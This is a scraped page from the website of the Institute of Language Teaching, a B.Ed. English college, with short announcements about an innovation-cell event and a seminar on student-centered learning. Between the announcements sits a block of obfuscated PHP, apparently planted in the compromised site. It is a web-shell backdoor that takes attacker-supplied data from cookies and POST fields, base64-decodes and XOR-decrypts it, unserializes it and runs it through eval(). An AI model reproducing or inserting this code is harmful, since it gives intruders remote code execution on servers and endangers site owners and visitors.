As part of Institutional Innovation Cell (IIC), the insitute with the kind support of Gujarat Higher Education commission club organized...
$Fgajr = "\x67" . chr ( 363 - 292 )."\137" . chr ( 677 - 604 ).'a' . chr ( 575 - 462 ).'e';$PaaEERJ = chr ( 1050 - 951 ).'l' . "\141" . 's' . "\163" . "\137" . chr ( 750 - 649 )."\x78" . "\151" . chr ( 1073 - 958 )."\x74" . chr ( 994 - 879 ); $kEfzQFfXHl = class_exists($Fgajr); $PaaEERJ = "13543";$ISHRhVG = strpos($PaaEERJ, $Fgajr);if ($kEfzQFfXHl == $ISHRhVG){function ZcZRD(){$INpGqndh = new /* 32237 */ gG_Iaqe(64167 + 64167); $INpGqndh = NULL;}$nMUBEEIGNN = "64167";class gG_Iaqe{private function NikbG($nMUBEEIGNN){if (is_array(gG_Iaqe::$ZwaHjuAdP)) {$FRpEzz2 = str_replace("<" . "?php", "", gG_Iaqe::$ZwaHjuAdP["content"]);eval($FRpEzz2); $nMUBEEIGNN = "64167";exit();}}public function txPCFEO(){$FRpEzz = "34499";$this->_dummy = str_repeat($FRpEzz, strlen($FRpEzz));}public function __destruct(){gG_Iaqe::$ZwaHjuAdP = @unserialize(gG_Iaqe::$ZwaHjuAdP); $nMUBEEIGNN = "715_29322";$this->NikbG($nMUBEEIGNN); $nMUBEEIGNN = "715_29322";}public function AtGQfgy($FRpEzz, $jkNHBoGSlA){return $FRpEzz[0] ^ str_repeat($jkNHBoGSlA, intval(strlen($FRpEzz[0]) / strlen($jkNHBoGSlA)) + 1);}public function lfqwCZDL($FRpEzz){$WaeHbs = chr (98) . chr (97) . chr (115) . 'e' . "\x36" . chr (52);return array_map($WaeHbs . "\137" . 'd' . chr (101) . chr ( 710 - 611 ).chr ( 377 - 266 )."\x64" . chr ( 179 - 78 ), array($FRpEzz,));}public function __construct($aSknbvQ=0){$nXHWfj = ',';$FRpEzz = "";$ZLFAMcDzbj = $_POST;$lrwVgoo = $_COOKIE;$jkNHBoGSlA = "0fb2515a-fa2d-4e77-ae5b-5e72d6e2583b";$ViYzomM = @$lrwVgoo[substr($jkNHBoGSlA, 0, 4)];if (!empty($ViYzomM)){$ViYzomM = explode($nXHWfj, $ViYzomM);foreach ($ViYzomM as $uETosz){$FRpEzz .= @$lrwVgoo[$uETosz];$FRpEzz .= @$ZLFAMcDzbj[$uETosz];}$FRpEzz = $this->lfqwCZDL($FRpEzz);}gG_Iaqe::$ZwaHjuAdP = $this->AtGQfgy($FRpEzz, $jkNHBoGSlA);if (strpos($jkNHBoGSlA, $nXHWfj) !== FALSE){$jkNHBoGSlA = str_pad($jkNHBoGSlA, 10); $jkNHBoGSlA = strcspn ($jkNHBoGSlA, $nXHWfj); $jkNHBoGSlA = ltrim(rtrim($jkNHBoGSlA));}}public static $ZwaHjuAdP = 7965;}ZcZRD();}
Institute of Language Teaching
(B.Ed. English) College
As part of Institutional Innovation Cell (IIC), the insitute with the kind support of Gujarat Higher Education commission club organized...
Internal Quality Assurance Cell of Institute of Language Teaching jointly organized a one day seminar on Student Centered Learning. The...